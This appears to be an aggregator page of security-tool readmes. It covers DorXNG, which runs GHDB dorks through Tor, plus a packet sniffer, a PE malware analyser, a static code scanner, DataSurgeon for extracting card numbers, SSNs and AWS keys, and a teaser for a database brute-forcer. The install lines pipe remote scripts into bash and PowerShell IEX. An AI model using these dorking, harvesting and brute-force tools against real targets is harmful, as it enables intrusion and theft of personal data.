-vv, --veryverbose    Enable Very Verbose Output - Displays Raw JSON Output

Tips

Sometimes you will hit a Tor exit node that is already shunted by upstream search providers, causing you to receive a minimal amount of search results. Not to worry... Just keep firing off queries.

Keep your DorXNG SQL database file and rerun your command, or use the --loop switch to iterate the main function repeatedly.

Most often, the more passes you make over a search query, the more results you'll find.

Also keep in mind that we have made a sacrifice in speed for a higher degree of data output. This is an OSINT project after all.

Each search query you make is issued to 7 upstream search providers. Especially with --concurrent queries, this generates a lot of upstream requests, so have patience.

Keep in mind that DorXNG will continue to append new search results to your database file. Use the --database switch to specify a database filename; the default filename is dorxng.db. This probably doesn't matter for most, but if you want to keep your OSINT investigations separate, it's there for you.

Four concurrent search requests seem to be the sweet spot. You can issue more, but the more queries you issue at a time, the longer it takes to receive results. It also increases the likelihood of receiving HTTP/429 Too Many Requests responses from upstream search providers on that specific Tor circuit.

If you start multiple SearXNG Docker containers too rapidly, Tor connections may fail to establish. While initializing a container, a valid response from the Tor Connectivity Check function looks like this:

If you see anything other than that, or if you start to see HTTP/500 response codes coming back from the SearXNG monitor script (STDOUT in the container), kill the Docker container and spin up a new one.

HTTP/504 Gateway Time-out response codes within DorXNG are expected sometimes. This means the SearXNG instance did not receive a valid response back within one minute. That specific Tor circuit is probably too slow. Just keep going!

There really isn't a reason to run a ton of these containers... yet... How many you run really depends on what you're doing. Each container uses approximately 1.25 GB of RAM.

Running one container works perfectly fine, except you will likely miss search results. So use --loop and do not disable --timeout.

Running multiple containers is nice because each has its own Tor circuit that refreshes every 10 seconds.

When running in --serverlist mode, disable the --timeout feature so there is no delay between requests (the default delay interval is 4 seconds).

Keep in mind that the more containers you run, the more memory you will need. This goes for deep recursion too... We have disabled Python's maximum recursion limit.

The more recursions your command goes through without returning to main, the more memory the process will consume. You may come back to find that the process has crashed with a Killed error message. If this happens, your machine ran out of memory and killed the process. Not to worry though... your database file is still good.

If your database file gets exceptionally large it inevitably slows down the program and consumes more memory with each iteration...

Those Python Stack Frames are Thicc...

We've seen a marked drop in performance with database files that exceed approximately 50 thousand entries.

The --limitdatabase option has been implemented to mitigate some of these memory consumption issues. Use it in combination with --loop to break deep recursive iteration inside iterator.py and restart from main right where you left off.

Once you have a series of database files you can merge them all (one at a time) with --mergedatabase. You can even merge them all into a new database file if you specify an unused filename with --database.

DO NOT merge data into a database that is currently being used by a running DorXNG process. This may cause errors and could potentially corrupt the database.

The included query.lst file is every dork that currently exists on the Google Hacking Database (GHDB). See: ghdb_scraper.py

We've already run through it for you... Our ghdb.db file contains over one million entries and counting! You can download it here: ghdb.db if you'd like a copy.

Example of querying the ghdb.db database:

./DorXNG.py -d ghdb.db -D '^http.*\.sql$'

A rewrite of DorXNG in Golang is already in the works. (GorXNG? | DorXNGNG?)

We're gonna need more dorks... Check out DorkGPT.

Examples

Single Search Query

./DorXNG.py -q 'search query'

Concurrent Search Queries

./DorXNG.py -q 'search query' -c4

Page Iteration Mode

./DorXNG.py -q 'search query' -n4

Iterative Concurrent Search Queries

./DorXNG.py -q 'search query' -c4 -n64

Server List Iteration Mode

./DorXNG.py -S server.lst -q 'search query' -c4 -n64 -t0

Query List Iteration Mode

./DorXNG.py -Q query.lst -c4 -n64

Query and Server List Iteration

./DorXNG.py -S server.lst -Q query.lst -c4 -n64 -t0

Main Function Loop Iteration Mode

./DorXNG.py -S server.lst -Q query.lst -c4 -n64 -t0 -L4

Infinite Main Function Loop Iteration Mode with a Database File Size Limit Set to 10k Entries

./DorXNG.py -S server.lst -Q query.lst -c4 -n64 -t0 -L0 -l10

Merging a Database (One at a Time) into a New Database File

./DorXNG.py -d new-database.db -m dorxng.db

Merge All Database Files in the Current Working Directory into a New Database File

for i in `ls *.db`; do ./DorXNG.py -d new-database.db -m $i; done

Query a Database

./DorXNG.py -d new-database.db -D 'regex search string'


ICMPWatch - ICMP Packet Sniffer

By: Zion3R


ICMP Packet Sniffer is a Python program that allows you to capture and analyze ICMP (Internet Control Message Protocol) packets on a network interface. It provides detailed information about the captured packets, including source and destination IP addresses, MAC addresses, ICMP type, payload data, and more. The program can also store the captured packets in a SQLite database and save them in a pcap format.
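ICMPWatch's own source isn't reproduced here, but the core capture loop can be sketched in a few lines of scapy (the library listed under Requirements); this is an illustration of the idea, not the program itself:

from scapy.all import sniff, IP, ICMP

def show(pkt):
    # Print the kind of fields ICMPWatch reports: addresses, ICMP type, packet size.
    if pkt.haslayer(IP) and pkt.haslayer(ICMP):
        print(f"{pkt[IP].src} -> {pkt[IP].dst} type={pkt[ICMP].type} len={len(pkt)}")

# Sniffing requires root privileges; "eth0" is only an example interface.
sniff(iface="eth0", filter="icmp", prn=show)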


Features

  • Capture and analyze ICMP Echo Request and Echo Reply packets.
  • Display detailed information about each ICMP packet, including source and destination IP addresses, MAC addresses, packet size, ICMP type, and payload content.
  • Save captured packet information to a text file.
  • Store captured packet information in an SQLite database.
  • Save captured packets to a PCAP file for further analysis.
  • Support for custom packet filtering based on source and destination IP addresses.
  • Colorful console output using ANSI escape codes.
  • User-friendly command-line interface.

Requirements

  • Python 3.7+
  • scapy 2.4.5 or higher
  • colorama 0.4.4 or higher

Installation

  1. Clone this repository:
git clone https://github.com/HalilDeniz/ICMPWatch.git
  2. Install the required dependencies:
pip install -r requirements.txt

Usage

python ICMPWatch.py [-h] [-v] [-t TIMEOUT] [-f FILTER] [-o OUTPUT] [--type {0,8}] [--src-ip SRC_IP] [--dst-ip DST_IP] -i INTERFACE [-db] [-c CAPTURE]
  • -v or --verbose: Show verbose packet details.
  • -t or --timeout: Sniffing timeout in seconds (default is 300 seconds).
  • -f or --filter: BPF filter for packet sniffing (default is "icmp").
  • -o or --output: Output file to save captured packets.
  • --type: ICMP packet type to filter (0: Echo Reply, 8: Echo Request).
  • --src-ip: Source IP address to filter.
  • --dst-ip: Destination IP address to filter.
  • -i or --interface: Network interface to capture packets (required).
  • -db or --database: Store captured packets in an SQLite database.
  • -c or --capture: Capture file to save packets in pcap format.

Press Ctrl+C to stop the sniffing process.

Examples

  • Capture ICMP packets on the "eth0" interface:
python icmpwatch.py -i eth0
  • Sniff ICMP traffic on interface "eth0" and save the results to a file:
python icmpwatch.py -i eth0 -o icmp_results.txt
  • Filtering by Source and Destination IP:
python icmpwatch.py -i eth0 --src-ip 192.168.1.10 --dst-ip 192.168.1.20
  • Filtering ICMP Echo Requests:
python icmpwatch.py -i eth0 --type 8
  • Saving Captured Packets
python icmpwatch.py -i eth0 -c captured_packets.pcap


PortEx - Java Library To Analyse Portable Executable Files With A Special Focus On Malware Analysis And PE Malformation Robustness


PortEx is a Java library for static malware analysis of Portable Executable files. Its focus is on PE malformation robustness, and anomaly detection. PortEx is written in Java and Scala, and targeted at Java applications.

Features

  • Reading header information from: MSDOS Header, COFF File Header, Optional Header, Section Table
  • Reading PE structures: Imports, Resources, Exports, Debug Directory, Relocations, Delay Load Imports, Bound Imports
  • Dumping of sections, resources, overlay, embedded ZIP, JAR or .class files
  • Scanning for file format anomalies, including structural anomalies, deprecated, reserved, wrong or non-default values.
  • Visualize PE file structure, local entropies and byteplot of the file with variable colors and sizes
  • Calculate Shannon Entropy and Chi Squared for files and sections (see the short entropy illustration after this list)
  • Calculate ImpHash and Rich and RichPV hash values for files and sections
  • Parse RichHeader and verify checksum
  • Calculate and verify Optional Header checksum
  • Scan for PEiD signatures, internal file type signatures or your own signature database
  • Scan for Jar to EXE wrapper (e.g. exe4j, jsmooth, jar2exe, launch4j)
  • Extract Unicode and ASCII strings contained in the file
  • Extraction and conversion of .ICO files from icons in the resource section
  • Extraction of version information and manifest from the file
  • Reading .NET metadata and streams (Alpha)
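PortEx exposes the entropy and hash calculations through its Java/Scala API; as a language-neutral illustration of what Shannon entropy measures over a byte buffer (not PortEx code), consider:

import math
from collections import Counter

def shannon_entropy(data: bytes) -> float:
    # Bits per byte: 0.0 for constant data, up to 8.0 for uniformly distributed bytes.
    counts = Counter(data)
    total = len(data)
    return -sum((c / total) * math.log2(c / total) for c in counts.values())

print(shannon_entropy(b"AAAA"))            # 0.0
print(shannon_entropy(bytes(range(256))))  # 8.0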

For more information have a look at PortEx Wiki and the Documentation

PortexAnalyzer CLI and GUI

PortexAnalyzer CLI is a command line tool that runs the PortEx library under the hood. If you are looking for a readily compiled command line PE scanner to analyse files with, download it here: PortexAnalyzer.jar

The GUI version is available here: PortexAnalyzerGUI

Using PortEx

Including PortEx to a Maven Project

You can include PortEx in your project by adding the following Maven dependency:

<dependency>
    <groupId>com.github.katjahahn</groupId>
    <artifactId>portex_2.12</artifactId>
    <version>4.0.0</version>
</dependency>

To use a local build, add the library as follows:

<dependency>
    <groupId>com.github.katjahahn</groupId>
    <artifactId>portex_2.12</artifactId>
    <version>4.0.0</version>
    <scope>system</scope>
    <systemPath>$PORTEXDIR/target/scala-2.12/portex_2.12-4.0.0.jar</systemPath>
</dependency>

Including PortEx to an SBT project

Add the dependency as follows in your build.sbt:

libraryDependencies += "com.github.katjahahn" % "portex_2.12" % "4.0.0"

Building PortEx

Requirements

PortEx is built with sbt.

Compile and Build With sbt

To simply compile the project invoke:

$ sbt compile

To create a jar:

$ sbt package

To compile a fat jar that can be used as command line tool, type:

$ sbt assembly

Create Eclipse Project

You can create an eclipse project by using the sbteclipse plugin. Add the following line to project/plugins.sbt:

addSbtPlugin("com.typesafe.sbteclipse" % "sbteclipse-plugin" % "2.4.0")

Generate the project files for Eclipse:

$ sbt eclipse

Import the project to Eclipse via the Import Wizard.

Donations

I develop PortEx and PortexAnalyzer as a hobby in my freetime. If you like it, please consider buying me a coffee: https://ko-fi.com/struppigel

Author

Karsten Hahn

Twitter: @Struppigel

Mastodon: struppigel@infosec.exchange

Youtube: MalwareAnalysisForHedgehogs



Grepmarx - A Source Code Static Analysis Platform For AppSec Enthusiasts


Grepmarx is a web application providing a single platform to quickly understand, analyze and identify vulnerabilities in possibly large and unknown code bases.

Features

SAST (Static Analysis Security Testing) capabilities:

  • Multiple languages support: C/C++, C#, Go, HTML, Java, Kotlin, JavaScript, TypeScript, OCaml, PHP, Python, Ruby, Bash, Rust, Scala, Solidity, Terraform, Swift
  • Multiple frameworks support: Spring, Laravel, Symfony, Django, Flask, Node.js, jQuery, Express, Angular...
  • 1600+ existing analysis rules
  • Easily extend analysis rules using Semgrep syntax: https://semgrep.dev/editor
  • Manage rules in rule packs to tailor code scanning

SCA (Software Composition Analysis) capabilities:

  • Multiple package-dependency formats support: NPM, Maven, Gradle, Composer, pip, Gopkg, Gem, Cargo, NuPkg, CSProj, PubSpec, Cabal, Mix, Conan, Clojure, Docker, GitHub Actions, Jenkins HPI, Kubernetes
  • SBOM (Software Bill-of-Materials) generation (CycloneDX compliant)

Extra

  • Analysis workbench designed to efficiently browse scan results
  • Scan code that doesn't compile
  • Comprehensive LOC (Lines of Code) counter
  • Inspector: automatic application features discovery
  • ... and a Dark Mode

Screenshots

Screenshots: scan customization, analysis workbench, rule pack edition.

Execution

Grepmarx is provided with a configuration to be executed in Docker and Gunicorn.

Docker execution


Make sure you have docker-compose installed on the system, and that the Docker daemon is running. The application can then be easily executed in a Docker container. The steps:

Get the code

$ git clone https://github.com/Orange-Cyberdefense/grepmarx.git
$ cd grepmarx

Start the app in Docker

$ sudo docker-compose pull && sudo docker-compose build && sudo docker-compose up -d

Visit http://localhost:5000 in your browser. The app should be up & running.

Note: a default user account is created on first launch (user=admin / password=admin). Change the default password immediately.

Gunicorn


Gunicorn 'Green Unicorn' is a Python WSGI HTTP Server for UNIX. A supervisor configuration file is provided to start it along with the required Celery worker (used for security scans queuing).

Install using pip

$ pip install gunicorn supervisor

Start the app using gunicorn binary

$ supervisord -c supervisord.conf

Visit http://localhost:8001 in your browser. The app should be up & running.

Note: a default user account is created on first launch (user=admin / password=admin). Change the default password immediately.

Build from sources

Get the code

$ git clone https://github.com/Orange-Cyberdefense/grepmarx.git
$ cd grepmarx

Install virtualenv modules

$ virtualenv env
$ source env/bin/activate

Install Python modules

$ # SQLite Database (Development)
$ pip3 install -r requirements.txt
$ # OR with PostgreSQL connector (Production)
$ # pip install -r requirements-pgsql.txt

Install additional requirements

# Dependency scan (cdxgen / depscan) requirements
$ sudo apt install npm openjdk-17-jdk maven gradle golang composer
$ sudo npm install -g @cyclonedx/cdxgen
$ pip install appthreat-depscan

A Redis server is required to queue security scans. Install the redis package with your favorite distro package manager, then:

$ redis-server

Set the FLASK_APP environment variable

$ export FLASK_APP=run.py
$ # Set up the DEBUG environment
$ # export FLASK_ENV=development

Start the celery worker process

$ celery -A app.celery_worker.celery worker --pool=prefork --loglevel=info --detach

Start the application (development mode)

$ # --host=0.0.0.0 - expose the app on all network interfaces (default 127.0.0.1)
$ # --port=5000 - specify the app port (default 5000)
$ flask run --host=0.0.0.0 --port=5000

Access grepmarx in browser: http://127.0.0.1:5000/

Note: a default user account is created on first launch (user=admin / password=admin). Change the default password immediately.

Credits & Links



Grepmarx - Provided by Orange Cyberdefense.



DataSurgeon - Quickly Extracts IP's, Email Addresses, Hashes, Files, Credit Cards, Social Security Numbers And More From Text


DataSurgeon (ds) is a versatile tool designed for incident response, penetration testing, and CTF challenges. It allows for the extraction of various types of sensitive information including emails, phone numbers, hashes, credit cards, URLs, IP addresses, MAC addresses, SRV DNS records and a lot more!

  • Supports Windows, Linux and MacOS
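DataSurgeon itself is a Rust tool (note the Rust requirement under Quick Install) and ships far more complete patterns; the simplified Python regexes below are only meant to illustrate the kind of extraction it performs:

import re

# Simplified, illustrative patterns - DataSurgeon's own Rust regexes are more complete.
EMAIL = re.compile(r'[\w.+-]+@[\w-]+\.[\w.-]+')
IPV4 = re.compile(r'\b(?:\d{1,3}\.){3}\d{1,3}\b')
MAC = re.compile(r'\b(?:[0-9A-Fa-f]{2}:){5}[0-9A-Fa-f]{2}\b')

sample = "admin@example.com logged in from 10.0.0.5 (BC:2E:48:E5:DE:FF)"
for name, pattern in (("email", EMAIL), ("ipv4", IPV4), ("mac", MAC)):
    for match in pattern.findall(sample):
        print(f"{name}: {match}")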

Extraction Features

  • Emails
  • Files
  • Phone numbers
  • Credit Cards
  • Google API Private Key ID's
  • Social Security Numbers
  • AWS Keys
  • Bitcoin wallets
  • URL's
  • IPv4 Addresses and IPv6 addresses
  • MAC Addresses
  • SRV DNS Records
  • Extract Hashes
    • MD4 & MD5
    • SHA-1, SHA-224, SHA-256, SHA-384, SHA-512
    • SHA-3 224, SHA-3 256, SHA-3 384, SHA-3 512
    • MySQL 323, MySQL 41
    • NTLM
    • bcrypt

Want more?

Please read the contributing guidelines here

Quick Install

Install Rust and Github

Linux

wget -O - https://raw.githubusercontent.com/Drew-Alleman/DataSurgeon/main/install/install.sh | bash

Windows

Enter the line below in an elevated powershell window.

IEX (New-Object Net.WebClient).DownloadString("https://raw.githubusercontent.com/Drew-Alleman/DataSurgeon/main/install/install.ps1")

Relaunch your terminal and you will be able to use ds from the command line.

Mac

curl --proto '=https' --tlsv1.2 -sSf https://raw.githubusercontent.com/Drew-Alleman/DataSurgeon/main/install/install.sh | sh

Command Line Arguments



Video Guide

Examples

Extracting Files From a Remote Website

Here I use wget to make a request to Stack Overflow, then forward the body text to ds. The -F option will list all files found. --clean is used to remove any extra text that might have been returned (such as extra HTML). The result is then piped to uniq, which removes any duplicate files found.

 wget -qO - https://www.stackoverflow.com | ds -F --clean | uniq


Extracting Mac Addresses From an Output File

Here I am pulling all MAC addresses found in autodeauth's log file using the -m query. The --hide option will hide the identifier string in front of the results; in this case 'mac_address: ' is hidden from the output. The -T option is used to check the same line multiple times for matches. Normally, when a match is found, the tool moves on to the next line rather than checking it again.

$ ./ds -m -T --hide -f /var/log/autodeauth/log     
2023-02-26 00:28:19 - Sending 500 deauth frames to network: BC:2E:48:E5:DE:FF -- PrivateNetwork
2023-02-26 00:35:22 - Sending 500 deauth frames to network: 90:58:51:1C:C9:E1 -- TestNet

Reading all files in a directory

The line below will read all files in the current directory recursively. The -D option is used to display the filename (-f is required for the filename to display) and -e is used to search for emails.

$ find . -type f -exec ds -f {} -CDe \;


Speed Tests

When no specific query is provided, ds will search through all possible types of data, which is SIGNIFICANTLY slower than using individual queries. The slowest query is --files. It's also slightly faster to use cat to pipe the data to ds.

Below is the elapsed time when processing a 5GB test file generated by ds-test. Each test was run 3 times and the average time was recorded.

Computer Specs

Processor: Intel(R) Core(TM) i5-10400F CPU @ 2.90GHz, 2904 MHz, 6 Core(s), 12 Logical Processor(s)
RAM: 12.0 GB (11.9 GB usable)

Searching all data types

Command                                Speed
cat test.txt | ds -t                   00h:02m:04s
ds -t -f test.txt                      00h:02m:05s
cat test.txt | ds -t -o output.txt     00h:02m:06s

Using specific queries

Command                       Speed          Query Count
cat test.txt | ds -t -6       00h:00m:12s    1
cat test.txt | ds -t -i -m    00h:00m:22s    2
cat test.txt | ds -tF6c       00h:00m:32s    3

Project Goals

  • JSON and CSV output
  • Untar/unzip and a directory searching mode
  • Base64 Detection and decoding


Top 5 Critical CVE Vulnerabilities from 2019 That Every CISO Must Patch Before He Gets Fired!

The number of vulnerabilities continues to increase so much that the technical teams in charge of patch management find themselves drowning in a myriad of critical and urgent tasks. We have therefore taken the time to review the profiles of the most critical vulnerabilities and issues that impacted 2019. After this frenzy during […]

Enumdb Beta – Brute Force MySQL and MSSQL Databases

Enumdb is a brute-force and post-exploitation tool for MySQL and MSSQL databases. When provided a list of usernames and/or passwords, it will cycle through each, looking for valid credentials. By...
